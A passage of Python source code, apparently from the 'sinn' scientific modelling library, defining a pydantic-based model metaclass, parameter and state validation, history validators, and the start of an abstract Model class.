(e.g. only derivatives which don't depend on other histories).\n \"\"\"\n # For consistency, we always use a tuple as key, to allow higher order derivatives\n if isinstance(hist_nm, str):\n hist_nm = (hist_nm,)\n def dec(f):\n f._derivative = hist_nm\n f._inputs = inputs\n return f\n return dec\n\n@dataclass\nclass DerivativesView:\n model: Model\n def __getitem__(self, histnm):\n if isinstance(histnm, str):\n histnm = (histnm,)\n fn_nm = self.model._derivatives[histnm].__name__ # _derivatives contains the *plain functions* attached to the *class*\n return getattr(self.model, fn_nm) # returns the same-named *method* attached to the *instance*\n\n# This text is added to the docstring of each model\n__model_docstring_footer__ = textwrap.dedent(\"\"\"\n .. Warning::\n If you need to set the model to a predictable state, use the provided\n `~Model.reseed_rngs` method. Simply setting the state of `self.rng`\n will work for NumPy RNGs, but not symbolic ones.\"\"\")\n\nclass ModelMetaclass(pydantic.main.ModelMetaclass):\n\n def _param_typedict(params: Union[Model,Type[Model],Type[ModelParams]]):\n if isinstance(params, Model) or lenient_issubclass(params, Model):\n params = params.Parameters\n for θnm, field in params.__fields__.items():\n if lenient_issubclass(field.type_, ModelParams):\n for subθnm, subT in get_param_types(field.type_):\n yield f\"{θnm}.{subθnm}\", subT\n else:\n yield θnm, field.type_\n\n # Partial list of magical things done by this metaclass:\n # - Transform a plain `Parameters` class into a pydantic BaseModel\n # (specifically, ModelParams)\n # - Add the `params: Parameters` attribute to the annotatons.\n # Ensure it inherits from the changed `Parameters`\n # - Move `params` to the front of the annotations list, so it is available\n # to validators.\n # - Add the `time` annotation if it isn't already present.\n def __new__(metacls, cls, bases, namespace):\n if '__throwaway_class' in namespace:\n # During MRO resolution, we need to create a throwaway class to\n # determine the MRO of the final class. In that case we want to\n # skip all the metaclass activity because\n # 1) It's wasteful to do all the annotation/parameter parsing\n # 2) It would attempt to create its own throwaway class,\n # leading to infinite recursion\n return super().__new__(metacls, cls, bases, namespace)\n\n # Make a copy of namespace, so we can modify it below\n namespace = namespace.copy()\n\n # MRO resolution\n # We will need to retrieve attributes which may be anywhere in the MRO.\n # USE: Sanity checks, retrieve `Parameters`, inherited annotations\n # NOTE: type.mro(metacls) would return the MRO of the metaclass, while\n # we want that of the still uncreated class.\n # Option 1: Create a new throwaway class, and use its `mro()` method\n # Implementation: type('temp', bases, namespace)\n # Problem: Infinite recursion if Model is within `bases`\n # Option 2: Force `bases` to have one element, and call its `mro()`\n # Implementation: bases[0].mro()\n # Problem: Multiple inheritance of models is no longer possible.\n # # At the moment I begrudgingly went with Option 2, because I'm not sure\n # # of a use case for multiple inheritance.\n # nonabcbases = tuple(b for b in bases if b is not abc.ABC)\n # if len(nonabcbases) != 1:\n # from inspect import currentframe, getframeinfo\n # import pathlib\n # path = pathlib.Path(__file__).absolute()\n # frameinfo = getframeinfo(currentframe())\n # info = f\"{path}::line {frameinfo.lineno}\"\n # basesstr = ', '.join(str(b) for b in nonabcbases)\n # raise TypeError(\n # f\"Model {cls} has either no or multiple parents: {basesstr}.\\n\"\n # \"Models must inherit from exactly one class (eventually \"\n # \"`sinn.models.Model`). This is a technical limitation rather \"\n # \"than a fundamental one. If you need multiple inheritance for \"\n # f\"your model, have a look at the comments above {info}, and \"\n # \"see if you can contribute a better solution.\")\n # mro = bases[0].mro()\n # The solution below at least allows for multiple inheritance with\n # mixin classes\n try:\n Tmp = type('Tmp', bases, {**namespace, **{'__throwaway_class': None}})\n mro = Tmp.mro()[1:] # Exclude 'temp' throwaway class from MRO\n except TypeError as e:\n nonabcbases = tuple(b for b in bases if b is not abc.ABC)\n basesstr = ', '.join(str(b) for b in nonabcbases)\n if \"multiple bases have instance lay-out conflict\" in str(e):\n raise TypeError(\n f\"Model {cls} may have multiple parents inheriting \"\n \"from sinn.Model. Because sinn Models use __slots__, they \"\n \"cannot be used this way. If your goal is to define \"\n \"variants by changing some of the definitions of a model, \"\n \"consider defining those changes in a mixin class instead. \"\n \"As long as the mixin doesn't define __slots__, multiple \"\n \"inheritance with it should work.\"\n ) from e\n else:\n raise e\n\n # Existing attributes\n # (ChainMap gives precedence to elements earlier in the list)\n annotations = namespace.get('__annotations__', {})\n inherited_annotations = ChainMap(*(getattr(b, '__annotations__', {})\n for b in mro))\n all_annotations = ChainMap(annotations, inherited_annotations)\n inherited_kernel_identifiers = set(chain.from_iterable(\n _get_inherited_kernels(b) for b in bases))\n inherited_hist_identifiers = set(chain.from_iterable(\n _get_inherited_hists(b) for b in bases))\n inherited_pending_updates = dict(ChainMap(\n *({obj.hist_nm: obj for obj in _get_inherited_updates(b)}\n for b in bases)))\n inherited_derivatives = dict(ChainMap(\n *(_get_inherited_derivatives(b) for b in bases)))\n # NB: Although the _order_ of a ChainMap is set by iterating over\n # bases left-to-right, the _precedence_ of values goes\n # right-to-left.\n # This makes it comparable to a chain of .update() calls.\n # Old version which didn't work with mixins:\n # # (We only iterate over immediate bases, since those already contain\n # # the values for their parents.)\n # inherited_kernel_identifiers = set(chain.from_iterable(\n # getattr(b, '_kernel_identifiers', []) for b in bases[::-1]))\n # inherited_hist_identifiers = set(chain.from_iterable(\n # getattr(b, '_hist_identifiers', []) for b in bases[::-1]))\n # inherited_pending_updates = dict(ChainMap(\n # *({obj.hist_nm: obj for obj in getattr(b, '_pending_update_functions', [])}\n # for b in bases[::-1])))\n\n # Resolve string annotations (for 3.9+, annotations are always strings)\n # FIXME: Does it make sense to resolve these with the namespace of metacls.__module__ ?\n # A few lines below we do this again with the module’s namespace, which seems more sensible\n for nm, annot in annotations.items():\n if isinstance(annot, str):\n # To support forward refs, we leave as-is if undefined\n # Certain annotations (e.g. time) we need immediately, which\n # is why we do this before the class is defined\n annotations[nm] = sys.modules[metacls.__module__].__dict__.get(annot, annot)\n\n # Structures which accumulate the new class attributes\n new_annotations = {}\n _kernel_identifiers = inherited_kernel_identifiers\n _hist_identifiers = inherited_hist_identifiers\n _model_identifiers = {} # Use dict as an ordered set\n _pending_update_functions = inherited_pending_updates\n _derivatives = inherited_derivatives\n # pending updates use a dict to allow derived classes to override\n\n # Model validation\n ## Disallowed attributes\n for attr in ['ModelClass']:\n if attr in annotations:\n raise TypeError(f\"The attribute '{attr}' is disallowed for \"\n \"subclasses of 'sinn.models.Model'.\")\n\n # Replace any unnecessarily 'stringified' types\n # (Sometimes, even if types are in the namespace, they still\n # get set as strings in the annotations)\n # c.f. pydantic.main.update_forward_refs & pydantic.typing.evaluate_forwardref\n globalns = sys.modules[namespace.get('__module__', 'builtins')].__dict__\n # We don’t really insist on searching builtins: alternative would be\n # to make `globalns` an empty dict if '__module__' isn’t defined.\n for nm, T in annotations.items():\n if isinstance(T, str):\n annotations[nm] = globalns.get(T, T)\n\n ## `time` parameter\n if 'time' not in all_annotations:\n annotations['time'] = TimeAxis\n else:\n if (not isinstance(all_annotations['time'], type)\n or not issubclass(all_annotations['time'], DiscretizedAxis)):\n raise TypeError(\n \"`time` attribute must be an instance of `DiscretizedAxis` \"\n f\"(it has type {type(all_annotations['time'])}); \"\n \"in general `histories.TimeAxis` is an appropriate type.\")\n # ## 'initialize' method\n # if not isinstance(namespace.get('initialize', None), Callable):\n # raise TypeError(f\"Model {cls} does not define an `initialize` \"\n # \"method.\")\n\n # Add module-level annotations\n\n # --- From this point: annotations -> new_annotations ---\n\n # TODO?: Allow derived classes to redefine histories ?\n # We would just need to add the inherited kernel/hists after this loop\n for nm, T in annotations.items():\n if nm in new_annotations:\n raise TypeError(f\"Name clash in {cls} definition: '{nm}'\")\n new_annotations[nm] = T\n if isinstance(T, type) and issubclass(T, History):\n _hist_identifiers.add(nm)\n elif isinstance(T, type) and issubclass(T, Kernel):\n _kernel_identifiers.add(nm)\n elif isinstance(T, type) and cls != 'Model' and issubclass(T, Model):\n _model_identifiers[nm] = None # We use dict as an ordered set\n elif isinstance(T, PendingUpdateFunction):\n # FIXME: Remove. I don't remember why I originally put this branch\n raise AssertionError(\"Leftover PendingUpdateFunction\")\n # _pending_update_functions.append(obj)\n\n # Sanity check State subclass\n State = namespace.get('State', None)\n if State is None:\n for C in mro:\n State = getattr(C, 'State', None)\n if State is not None:\n break\n\n if abc.ABC in bases:\n # Deactivate warnings for abstract models\n pass\n elif State is None:\n if len(_hist_identifiers) > 0:\n # If there are no histories, it makes sense not to specify a State\n # This can happen for models which just combine submodels\n warn(f\"Model {cls} does not define a set of state variables.\")\n State = type('State', (), {'__annotations__': {}})\n namespace['State'] = State\n elif not hasattr(State, '__annotations__'):\n # We end up with sate-less histories, which are indicated with an empty State class\n State.__annotations__ = {}\n elif len(getattr(State, '__annotations__', {})) == 0:\n pass\n # warn(f\"Model {cls} has an empty `State` class.\")\n else:\n if issubclass(State, BaseModel):\n raise TypeError(f\"Model {cls} `State` must be a plain class, \"\n f\"not a Pydantic BaseModel.\")\n # if len(_hist_identifiers) == 0:\n # raise TypeError(\n # f\"Model {cls}: Variables declared in `State` are not all \"\n # \"declared as histories in the model.\")\n # Resolve string annotations (for 3.9+, annotations are always strings)\n for nm, annot in State.__annotations__.items():\n if isinstance(annot, str):\n # State.__annotations__[nm] = sys.modules[metacls.__module__].__dict__.get(annot, annot)\n State.__annotations__[nm] = globalns.get(annot, annot)\n for nm, T in State.__annotations__.items():\n histT = all_annotations.get(nm, None)\n if histT is None:\n raise TypeError(\n f\"Model {cls}: `State` defines '{nm}', which is not \"\n \"defined in the model.\")\n if T is not Any:\n raise TypeError(\n \"At the moment, all attributes of the `State` class \"\n \"should have type `Any`. In the future we may add \"\n \"the possibility to be more specific.\")\n # NOTE: If checking the type histT, remember that it may be\n # something else than a History (e.g. RNG).\n # elif T is not histT:\n # raise TypeError(\n # f\"Model {cls}: `State` defines '{nm}' with type '{T}', \"\n # f\"while the model defines it with type '{histT}'.\")\n\n # Get Parameters and Config: iterate through MRO and stop on 1st hit\n Parameters = namespace.get('Parameters', None) # First check namespace\n Config = namespace.get('Config', None)\n if Config is None:\n Config = type(\"Config\", (), {'keep_untouched': ()})\n for C in mro:\n if Parameters is not None: # and Config is not None:\n break # We've found the Parameters classes; no need to look further\n if Parameters is None:\n Parameters = getattr(C, 'Parameters', None)\n # if Config is None:\n # Config = getattr(C, 'Config', None)\n\n # Sanity check Parameters subclass\n # Parameters = namespace.get('Parameters', None)\n if not isinstance(Parameters, type):\n raise TypeError(f\"Model {cls}: `Parameters` must be a class.\")\n # if (not isinstance(Parameters, type)\n # or not issubclass(Parameters, BaseModel)):\n # raise TypeError(\n # f\"Model {cls}: `Parameters` must inherit from pydantic.\"\n # f\"BaseModel. `{cls}.Parameters.mro()`: {Parameters.mro()}.\")\n\n # Ensure `Parameters` inherits from ModelParams\n # FIXME: When doing this, ensure Parameters.__module__ is the same as\n # originally (and not 'abc')\n if not issubclass(Parameters, ModelParams):\n # We can't have multiple inheritance if the parents don't have the\n # same metaclass. Standard solution: Create a new metaclass, which\n # inherits from the other two, and use *that* as a metaclass.\n paramsmeta = type(ModelParams)\n if paramsmeta is not type(Parameters):\n paramsmeta = type(\"ParametersMeta_Subclass\",\n (paramsmeta, type(Parameters)),\n {})\n OldParameters = Parameters\n if (not issubclass(Parameters, BaseModel)\n and hasattr(Parameters, '__annotations__')):\n # If `Parameters` is not even a subclass of BaseModel, we have\n # to move its annotations to the derived class\n params_namespace = {'__annotations__': Parameters.__annotations__}\n # Also move any defined fields or default values\n # We also need to catch validators, etc.\n # FIXME: I haven't figured out a way to move validators. They\n # need to be of type 'classmethod' when pydantic sees\n # them, they only remain such during the creation of\n # the class. Afterwards, they are just 'methods'.\n # So, current approach is, if there are any non-dunder\n # attributes, we raise an error.\n if [attr for attr in dir(Parameters) if attr[:2] != '__']:\n raise TypeError(\"A model's `Parameters` must subclass \"\n \"`sinn.models.ModelParams`.\")\n # for attr in dir(Parameters):\n # if attr[:2] != '__':\n # params_namespace[attr] = getattr(Parameters, attr)\n # delattr(Parameters, attr)\n Parameters.__annotations__= {}\n else:\n params_namespace = {}\n Parameters = paramsmeta(\"Parameters\", (OldParameters, ModelParams),\n params_namespace)\n\n if any(\"Union\" in str(field.type_)\n for field in Parameters.__fields__.values()):\n possible_offenders = [field for field in Parameters.__fields__.values()\n if \"Union\" in str(field.type_)]\n # We allow 'Union' types in one case: if all types in the union\n # have the same dtype and ndim.\n offenders = []\n for field in possible_offenders:\n if getattr(field.type_, '__origin__', None) is not Union:\n # Things like List[Union[int, float]] will end up here\n offenders.append(field.name)\n continue\n dtypes = set()\n ndims = set()\n for T in field.type_.__args__:\n if hasattr(T, 'nptype'): # NPValue, Array, Tensor, Shared\n dtype = str(np.dtype(T.nptype))\n elif hasattr(T, 'dtype'): # Theano, PyMC3 types\n dtype = str(np.dtype(T.dtype))\n elif isinstance(T, type) and issubclass(T, np.number): # NumPy types\n dtype = str(np.dtype(T))\n else:\n # Not a NumPy compatible type\n offenders.append(field.name)\n break\n if hasattr(T, 'ndim_'): # NPValue, Array, PyMC_RV\n ndim = T.ndim_\n elif isinstance(getattr(T, 'ndim', None), int): # Theano, PyMC3 types\n ndim = T.ndim\n elif isinstance(T, type) and issubclass(T, np.number): # NumPy types\n ndim = 0\n else:\n # If none of the types specify ndim, that is also fine\n # NB: NPValue & co. set ndim to 'None' when it is unspecified\n ndim = None\n dtypes.add(dtype)\n ndims.add(ndim)\n if len(dtypes) > 1 or len(ndims) > 1:\n offenders.append(field.name)\n if offenders:\n logger.error(f\"Model '{cls}' has a Union type for the following \"\n f\"parameters: {offenders}.\\n\"\n \"This is strongly discouraged: The compilation of \"\n \"Theano models assumes that parameter types are fixed – \"\n \"breaking this assumption can cause nasty linker errors. \"\n \"Exception: Unions of types which all have the same \"\n \"dtype and number of dims are permitted.\")\n\n # Sanity check Config subclass, if present\n # Config = namespace.get('Config', None)\n # No warnings for Config: not required\n if not isinstance(Config, type):\n raise TypeError(f\"Model {cls} `Config` must be a class, \"\n f\"not {type(Config)}.\")\n\n # Rename State and Parameters classes for easier debugging/inspection\n # Don't just append the class name, because classes can be nested and\n # that could lead to multiple names\n # It seems prudent to leave __qualname__ untouched\n if getattr(State, '__name__', None) == \"State\":\n State.__name__ = f\"State ({cls})\"\n if getattr(Parameters, '__name__', None) == \"Parameters\":\n Parameters.__name__ == f\"Parameters ({cls})\"\n\n # Add 'params' variable if it isn't present, and place first in\n # the list of variables so that initializers can find it.\n if 'params' in new_annotations:\n ann_params = new_annotations['params']\n if new_annotations['params'] == 'Parameters':\n new_annotations['params'] = Parameters\n elif new_annotations['params'] is not Parameters:\n if isinstance(ann_params, type) and issubclass(Parameters, ann_params):\n new_annotations['params'] = Parameters\n else:\n raise TypeError(f\"Model {cls} defines `params` but it is \"\n f\"not of type `{cls}.Parameters`. \"\n f\"(Instead it is of type `{type(ann_params)}`)\")\n new_annotations = {'params': new_annotations.pop('params'),\n **new_annotations}\n elif issubclass(Parameters, abc.ABC):\n # Most likely no Parameters class was defined, and we retrieved\n # the abstract definition above.\n # => We skip creating the 'params' attribute, since there is no\n # point in requiring it when the model defines no parameters\n if len(_hist_identifiers) > 0:\n # If there are no histories, it makes sense not to specify a State\n # This can happen for models which just combine submodels\n warn(f\"Model '{type(self).__name__}' does not define a `Parameters` \"\n \"class, or its `Parameters` class inherits from `abc.ABC`.\")\n # Create a new type to minimize the risk of clobbering the base Parameters type\n Parameters = type('Parameters', (Parameters,), {})\n else:\n new_annotations = {'params': Parameters, **new_annotations}\n\n # Add update functions to list\n for obj in namespace.values():\n if isinstance(obj, PendingUpdateFunction):\n if obj.hist_nm not in _hist_identifiers:\n raise TypeError(\n f\"Update function {obj.fn} is intended for history \"\n f\"{obj.hist_nm}, but it is not defined in the model.\")\n _pending_update_functions[obj.hist_nm] = obj\n\n # Add derivatives to dict\n for obj in namespace.values():\n # NB: Existence of '_derivative' attribute indicates that function is a derivative\n # Value of '_derivative' attribute indicates of which variable it is the derivative\n # if isinstance(obj, Callable) and hasattr(obj, '_derivative'):\n if isinstance(obj, Callable_) and hasattr(obj, '_derivative'):\n if not set(obj._derivative) <= set(_hist_identifiers):\n raise TypeError(\n f\"Derivative function is intended for histories \"\n f\"{obj._derivative}, but they are not defined in the model.\")\n _derivatives[obj._derivative] = obj\n\n # Add AutoHist validators\n for nm, obj in list(namespace.items()):\n if isinstance(obj, AutoHist):\n T = all_annotations.get(nm, None)\n # Determine a name for the initialization validator which\n # doesn't match something already in `namespace`\n fn_nm = f\"autohist_{nm}\"\n if fn_nm in namespace:\n # I honestly don't know why someone would define a model\n # with clashing names, but just in case.\n for i in range(10):\n fn_nm = f\"autohist_{nm}_{i}\"\n if fn_nm not in namespace:\n break\n if fn_nm in namespace:\n raise AssertionError(\"ModelMetaclass.__new__: The function \"\n \"'{fn_nm}' is already in the namespace.\")\n if T is None:\n raise TypeError(\"`AutoHist` must follow a type annotation.\")\n if T is Series:\n namespace[fn_nm] = validator(\n nm, allow_reuse=True, always=True, pre=True)(\n init_autoseries)\n elif T is Spiketrain:\n namespace[fn_nm] = validator(\n nm, allow_reuse=True, always=True, pre=True)(\n init_autospiketrain)\n else:\n raise TypeError(\"Unrecognized history type; recognized \"\n \"types:\\n Series, Spiketrain\")\n\n # Add connected hists validators\n for submodel_nm in _model_identifiers:\n namespace[f\"_connect_submodel_{submodel_nm}\"] = \\\n connect_submodel_validator(submodel_nm)\n\n # Update namespace\n namespace['Config'] = Config\n namespace['Parameters'] = Parameters\n # It's not essential to have sorted identifiers (`list` would also work)\n # but predictability helps with debugging, and may affect serialization.\n namespace['_kernel_identifiers'] = sorted(_kernel_identifiers)\n namespace['_hist_identifiers'] = sorted(_hist_identifiers)\n namespace['_model_identifiers'] = list(_model_identifiers) # Must not be sorted: order sets precedence\n namespace['_pending_update_functions'] = list(_pending_update_functions.values())\n namespace['_derivatives'] = _derivatives\n namespace['__annotations__'] = new_annotations\n\n # Kind of a hacky way\n\n newcls = super().__new__(metacls, cls, bases, namespace)\n\n # Replace the developer docstring with a user docstring\n if abc.ABC not in bases:\n # If model class is still abstract, then the dev docstring is more appropriate\n newcls.__doc__ = newcls.summarize() + __model_docstring_footer__\n\n return newcls\n\n # TODO: Recognize RNG as input\n\n# Retrieve kernel_identifiers, hist_identifiers and update_functions\n# from an existing class.\n# This class may or may not subclass Model; in the former case there is\n# nothing beyond retrieving the attributes already set. In the latter case,\n# we reproduce how ModelMetaclass would extract them from annotations.\n# TODO: I'm not super happy with these functions; there should be a way to do\n# this with less repeated code\n# TODO: We lose here for mixins some sanity checks done in ModelMetaclass:\n# - That no annotations are duplicated\n# - That all update functions correspond to a hist_identifier\ndef _get_inherited_kernels(cls):\n kernel_identifiers = getattr(cls, '_kernel_identifiers', None)\n if kernel_identifiers is None:\n # cls doesn't inherit from Model – probably a mixin\n kernel_identifiers = set()\n for C in cls.mro()[::-1]:\n C_kernel_identifiers = getattr(C, '_kernel_identifiers', None)\n if C_kernel_identifiers is None:\n for nm, T in getattr(C, '__annotations__', {}).items():\n if isinstance(T, type) and issubclass(T, Kernel):\n kernel_identifiers.update(nm)\n for nm, T in getattr(cls, '__annotations__', {}).items():\n if isinstance(T, type) and issubclass(T, Kernel):\n kernel_identifiers.add(nm)\n return kernel_identifiers\ndef _get_inherited_hists(cls):\n hist_identifiers = getattr(cls, '_hist_identifiers', None)\n if hist_identifiers is None:\n # cls doesn't inherit from Model – probably a mixin\n hist_identifiers = set()\n for C in cls.mro()[::-1]:\n C_hist_identifiers = getattr(C, '_hist_identifiers', None)\n if C_hist_identifiers is None:\n for nm, T in getattr(C, '__annotations__', {}).items():\n if isinstance(T, type) and issubclass(T, History):\n hist_identifiers.update(nm)\n for nm, T in getattr(cls, '__annotations__', {}).items():\n if isinstance(T, type) and issubclass(T, History):\n hist_identifiers.add(nm)\n return hist_identifiers\ndef _get_inherited_updates(cls):\n pending_update_functions = getattr(cls, '_pending_update_functions', None)\n if pending_update_functions is None:\n # cls doesn't inherit from Model – probably a mixin\n pending_update_functions = []\n for obj in cls.__dict__.values():\n if isinstance(obj, PendingUpdateFunction):\n pending_update_functions.append(obj)\n return pending_update_functions\ndef _get_inherited_derivatives(cls):\n derivatives = getattr(cls, '_derivatives', None)\n if derivatives is None:\n # cls doesn't inherit from Model – probably a mixin\n derivatives = {}\n for obj in cls.__dict__.values():\n # NB: Existence of '_derivative' attribute indicates that function is a derivative\n # Value of '_derivative' attribute indicates of which variable it is the derivative\n if isinstance(obj, Callable_) and hasattr(obj, '_derivative'):\n derivatives[obj._derivative] = obj\n return derivatives\n\ndef init_autoseries(cls, autohist: AutoHist, values) -> Series:\n time = values.get('time', None)\n if time is None: return autohist\n if isinstance(autohist, dict):\n # We end up here when constructing a model from a dict,\n # which happens when we deserialize a model representation\n # `autohist` then is a complete definition for a history, but we\n # still make sure its time axis is consistent with the model's\n hist = Series.parse_obj(autohist)\n # Test compatibility by converting the two endpoints of the model's time axis\n try:\n time.t0idx.convert(hist.time)\n time.tnidx.convert(hist.time)\n except (TypeError, IndexError):\n raise AssertionError(f\"The time array of {hist.name} does not \"\n \"match that of the model.\\n\"\n f\"{hist.name}.time: {hist.time}\\n\"\n f\"Model.time: {time}\")\n return hist\n return Series(time=time, **autohist.kwargs)\n\ndef init_autospiketrain(cls, autohist: AutoHist, values) -> Spiketrain:\n time = values.get('time', None)\n if time is None: return autohist\n if isinstance(autohist, dict):\n # See comment in init_autoseries\n hist = Spiketrain.parse_obj(autohist)\n try:\n time.t0idx.convert(hist.time)\n time.tnidx.convert(hist.time)\n except (TypeError, IndexError):\n raise AssertionError(f\"The time array of {hist.name} does not \"\n \"match that of the model.\\n\"\n f\"{hist.name}.time: {hist.time}\\n\"\n f\"Model.time: {time}\")\n return hist\n else:\n return Spiketrain(time=time, **autohist.kwargs)\n\ndef connect_submodel_validator(submodel_name):\n \"\"\"\n One of these validators is added for each submodel in a composite model.\n When a history is part of multiple submodels, it is only serialized once.\n This validator adds histories back into the dictionaries for submodels\n where they are missing.\n\n Demonstrative usage::\n >>> class A(Model):\n ha: History\n class B(Model):\n hb: History\n class C(Model):\n a: A\n b: B\n _connect_submodel_a = connect_submodel_validator('a')\n _connect_submodel_b = connect_submodel_validator('b')\n\n Actual usage: The Model metaclass adds these validators automatically,\n so users do not need to do so in their models.\n \"\"\"\n def f(submodel, values):\n if not isinstance(submodel, dict):\n # This function only makes sense if `submodel` is not yet instantiated\n # but instead is a dict of attribute values\n # TODO: For instantiated models, we should still check that histories\n # are correctly connected\n return submodel\n conns = values.get('connections')\n if conns:\n for lowerobj, upperobj in conns.items():\n if upperobj.count('.') > 1:\n raise NotImplementedError(\n \"This function _might_ work when `upperobj` references \"\n \"more deeply nested models, but it should be tested first.\")\n uppermodel, histname = upperobj.rsplit('.')\n if uppermodel != submodel_name:\n continue\n if histname in submodel:\n raise ValueError(f\"Connect history '{lowerobj}' to \"\n f\"'{upperobj}': '{upperobj}' is already \"\n \"defined.\")\n # Recursively retrieve the lowerobj. Objects at different levels\n # may be both dicts and Models, so we need to support both `get`\n # and`getattr` (for the same reason, relying on ParameterSet\n # to do this won't work, since it won't recurse into objects.\n o = values\n for attr in lowerobj.split('.'):\n try:\n o = getattr(o, attr)\n except AttributeError:\n o = o[attr]\n # Connect the lower history to the upper one\n submodel[histname] = o\n return submodel\n f.__name__ = f\"connect_submodel_{submodel_name.replace('.', '_')}\"\n return validator(submodel_name, pre=True, allow_reuse=True)(f)\n\n_concrete_parameter_classes = {}\n\nclass Model(pydantic.BaseModel, abc.ABC, metaclass=ModelMetaclass):\n \"\"\"Abstract model class.\n\n A model implementation should derive from this class.\n\n Models **must**:\n\n - Inherit from `~sinn.models.Model`\n - Define a ``time`` attribute, of type `~sinn.histories.TimeAxis`.\n - Define define a `Parameters` class within their namespace, which inherits\n from `~pydantic.BaseModel`. This class should define all (and only) model\n parameters as annotations, using the syntax provided by `pydantic`.\n - Define an :meth:`initialize(self, initializer=None)` method. This method\n is intended to be called to reset the model (e.g. after a run / fit).\n It is also called during initialization to set up the model, unless the\n special value ``initializer='do not initialize'`` is passed.\n It's second argument must be ``initializer``, it must be optional, and\n the optional value must be ``None``.\n\n In practice, they will also:\n\n - Define histories and kernels as annotations to the model.\n - Define any number of validation/initialization methods, using either the\n `@pydantic.validators` or `@sinn.models.initializer` decorators.\n - Define update functions for the histories using the `@sinn.models.updatefunction`\n decorator.\n\n A typical class definition should look like::\n\n from sinn.histories import TimeAxis, Series\n from sinn.models import Model\n from pydantic import BaseModel\n\n class MyModel(Model):\n time: TimeAxis\n class Parameters(BaseModel):\n ...\n x: Series\n\n @initializer('x')\n def init_x(cls, x, time):\n return Series(time=time, ...)\n\n @updatefunction('x', inputs=())\n def upd_x(self, tidx):\n return ...\n\n .. Hint::\n If you are subclassing Model to create another abstract class (a class\n meant to be subclassed rather than used on its own), add `abc.ABC` to\n its parents – this will identify your model as abstract, and disable\n warnings about missing attributes like `State`. Be sure to use `ABC` as\n the last parent::\n\n from sinn.models import Model\n class MyModel(Model, abc.ABC):\n ...\n\n .. Warning::\n If you need to set the model to a predictable state, use the provided\n `~Model.reseed_rngs` method. Simply setting the state of `self.rng`\n will work for NumPy RNGs, but not symbolic ones.\n \"\"\"\n # TODO: Use the new PrivateAttr instead of __slots__\n __slots__ = ('graph_cache', 'compile_cache', '_pymc', #'batch_start_var', 'batch_size_var',\n '_num_tidx', '_curtidx_var', '_stoptidx_var', '_batchsize_var')\n # '_advance_updates', '_compiled_advance_fns')\n _num_tidx_objs: dict=PrivateAttr({})\n # _num_tidx objects are shared variables which can be used in\n # computational graphs. This caching attribute ensures the same object\n # is always returned, so that it can be properly substituted in the\n # computational graph. Since the variable depends on which state\n # histories are unlocked, a different object is returned for different\n # unlocked history combinations (hence the need for a dict)\n _advance_updates : dict=PrivateAttr({})\n _compiled_advance_fns: dict=PrivateAttr({})\n _rng_updates : defaultdict=PrivateAttr(\n defaultdict(lambda: defaultdict(lambda: [])))\n # Store RNG updates generated in `get_advance_updates`, so that\n # `reseed_RNGs` knows which RNG need to be seeded.\n # Structure: _rng_updates[cache_key][rng] = [upd1, upd2, ...]\n _derivatives_view: Optional[DerivativesView]=PrivateAttr(None)\n _numeric: Optional[Model]=PrivateAttr(None)\n # Used by `numeric` property to store a reference to the non-symbolic version\n # of the model, ensuring that the same instance is reused if called again.\n connections: Optional[Dict[str,str]]\n # Used to connect histories between submodels; mostly used for deserialization\n # Defines connection pairs for histories in different submodels\n # Order: {lower model.hist name : upper model.hist name},\n # where the \"lower\" model is the one which can be instantiated first\n # IMPORTANT: It is not required to set this variable in order to connect\n # histories; simply reusing the same history instance will do.\n # Once a model is constructed, its `connections` attribute\n # is updated to reflect actual history connections.\n\n class Config:\n # Allow assigning other attributes during initialization.\n extra = 'allow'\n keep_untouched = (ModelParams, PendingUpdateFunction, class_or_instance_method)\n json_encoders = {**mtb.typing.json_encoders,\n **History.Config.json_encoders}\n\n class Parameters(abc.ABC, ModelParams):\n \"\"\"\n Models must define a `Parameters` class within their namespace.\n Don't inherit from this class; i.e. do::\n\n class MyModel(Model):\n class Parameters(BaseModel):\n ...\n \"\"\"\n pass\n\n # =================================================\n # Construction, initialization, copying, validation\n # =================================================\n\n # Register subclasses so they can be deserialized\n def __init_subclass__(cls):\n if not inspect.isabstract(cls) and '__throwaway_class' not in cls.__dict__:\n mtb.iotools.register_datatype(cls)\n\n def __new__(cls, ModelClass=None, **kwargs):\n \"\"\"\n Allow instantiating a more specialized Model from the base class.\n If `ModelClass` is passed (usually a string from the serialized model),\n the corresponding model type is loaded from those registered with\n mtb.iotools. Class construction is then diverted to that subclass.\n `ModelClass` also serves as a flag, to indicate that we are\n reconstructing a model (either from memory or disk), and so that it\n should not be initialized.\n \"\"\"\n if ModelClass is not None:\n if isinstance(ModelClass, str):\n try:\n # TODO: Fix API so we don't need to use private _load_types\n ModelClass = mtb.iotools._load_types[ModelClass]\n except KeyError as e:\n raise ValueError(f\"Unrecognized model type '{ModelClass}'.\"\n ) from e\n if not (isinstance(ModelClass, type) and issubclass(ModelClass, cls)):\n raise AssertionError(f\"Model.__new__: {ModelClass} is not a subclass of {cls}.\")\n if 'initializer' not in kwargs:\n kwargs['initializer'] = 'do not initialize'\n # IMPORTANT: __init__ will still be called with original sig,\n # so setting 'initializer' needs to be done there too.\n # If there are more sig. changes, we may want to call __init__\n # here ourselves, and e.g. set a '_skip_init' attribute\n return ModelClass.__new__(ModelClass, **kwargs)\n else:\n return super().__new__(cls)\n\n def __init__(self, initializer=None, ModelClass=None, **kwargs):\n # Recognize if being deserialized, as we do in __new__\n if ModelClass is not None and initializer is None:\n initializer = 'do not initialize'\n # Any update function specification passed as argument needs to be\n # extracted and passed to _base_initialize, because update functions\n # can't be created until the model (namespace) exists\n update_functions = {}\n replace_in_dict = {}\n kwargs = copy.copy(kwargs)\n # NB: We specifically don't recurse into kwargs for submodels:\n # the update_function specs for submodels need to remain in kwargs\n # until they reach their submodel, so that it can attach it correctly\n for attr, v in kwargs.items():\n # Deals with the case where we initialize from a .dict() export\n if isinstance(v, dict) and 'update_function' in v:\n update_functions[f\"{attr}.update_function\"] = v['update_function']\n update_functions[f\"{attr}.range_update_function\"] = v.get('range_update_function', None)\n replace_in_dict[attr] = copy.copy(v)\n replace_in_dict[attr]['update_function'] = None\n replace_in_dict[attr]['range_update_function'] = None\n # TEMP WORKAROUND – for tasks created before we excluded 'Parameters' in dict()\n kwargs.pop(\"Parameters\", None)\n # We do it this way to avoid mutating the kwargs\n for attr, v in replace_in_dict.items():\n kwargs[attr] = v\n # Initialize attributes with Pydantic\n super().__init__(**kwargs)\n # Attach update functions to histories, and set up __slots__\n self._base_initialize(update_functions=update_functions)\n # Run the model initializer\n if not isinstance(initializer, str) or initializer != 'do not initialize':\n self.initialize(initializer)\n\n def copy(self, *args, deep=False, **kwargs):\n if deep:\n if args or 